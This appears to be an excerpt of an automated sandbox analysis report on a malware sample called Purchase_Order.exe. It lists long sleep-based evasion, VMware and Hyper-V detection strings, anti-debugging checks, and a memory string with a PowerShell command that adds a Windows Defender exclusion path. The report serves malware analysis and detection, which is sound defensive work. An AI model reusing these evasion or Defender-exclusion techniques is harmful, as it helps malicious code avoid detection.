Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239422s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -239000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238750s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238641s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238516s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -238063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237563s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -237110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -236094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -235110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -234047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233641s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233516s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233266s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -233016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232688s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232563s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232438s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -232078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -231953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5376 Thread sleep time: -101499s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -231828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -231719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -231594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 Thread sleep time: -231469s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4772 Thread sleep time: -45000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 4580 Thread sleep time: -44000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 240000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239844 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239656 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239531 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239422 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 239000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238891 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238750 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238641 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238516 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238406 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238297 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 238063 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237828 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237719 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237563 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237453 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237344 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237219 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 237110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236844 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236735 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236610 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236469 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236360 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236203 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 236094 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235985 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235860 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235735 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235610 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235485 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235360 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235235 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 235110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234828 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234703 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234594 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234453 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 234047 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233906 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233781 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233641 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233516 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233375 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233266 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233141 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 233016 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232906 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232797 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232688 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232563 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232438 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232203 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 232078 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231953 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 101499 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231828 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231719 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231594 Jump to behavior
Source: C:\Users\user\Desktop\Purchase_Order.exe Thread delayed: delay time: 231469 Jump to behavior
Source: explorer.exe, 00000007.00000000.287460148.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000007.00000000.287460148.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.288044675.0000000008CC6000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000000.287675555.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000007.00000000.287548556.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000007.00000000.288076974.0000000008CEA000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.287675555.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: vmware
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.278193796.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.263912988.0000000000F73000.00000004.00000020.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000007.00000000.287675555.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000007.00000000.287548556.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000007.00000000.282879554.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Purchase_Order.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_004088B0 rdtsc 4_2_004088B0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_00409B20 LdrLoadDll, 4_2_00409B20
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01294120 mov ecx, dword ptr fs:[00000030h] 4_2_01294120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A513A mov eax, dword ptr fs:[00000030h] 4_2_012A513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A513A mov eax, dword ptr fs:[00000030h] 4_2_012A513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279100 mov eax, dword ptr fs:[00000030h] 4_2_01279100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279100 mov eax, dword ptr fs:[00000030h] 4_2_01279100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_01279100 mov eax, dword ptr fs:[00000030h] 4_2_01279100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127C962 mov eax, dword ptr fs:[00000030h] 4_2_0127C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127B171 mov eax, dword ptr fs:[00000030h] 4_2_0127B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0127B171 mov eax, dword ptr fs:[00000030h] 4_2_0127B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129B944 mov eax, dword ptr fs:[00000030h] 4_2_0129B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_0129B944 mov eax, dword ptr fs:[00000030h] 4_2_0129B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F69A6 mov eax, dword ptr fs:[00000030h] 4_2_012F69A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A61A0 mov eax, dword ptr fs:[00000030h] 4_2_012A61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012A61A0 mov eax, dword ptr fs:[00000030h] 4_2_012A61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h] 4_2_012F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h] 4_2_012F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h] 4_2_012F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h] 4_2_012F51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h] 4_2_012999BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h] 4_2_013349A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h] 4_2_013349A4
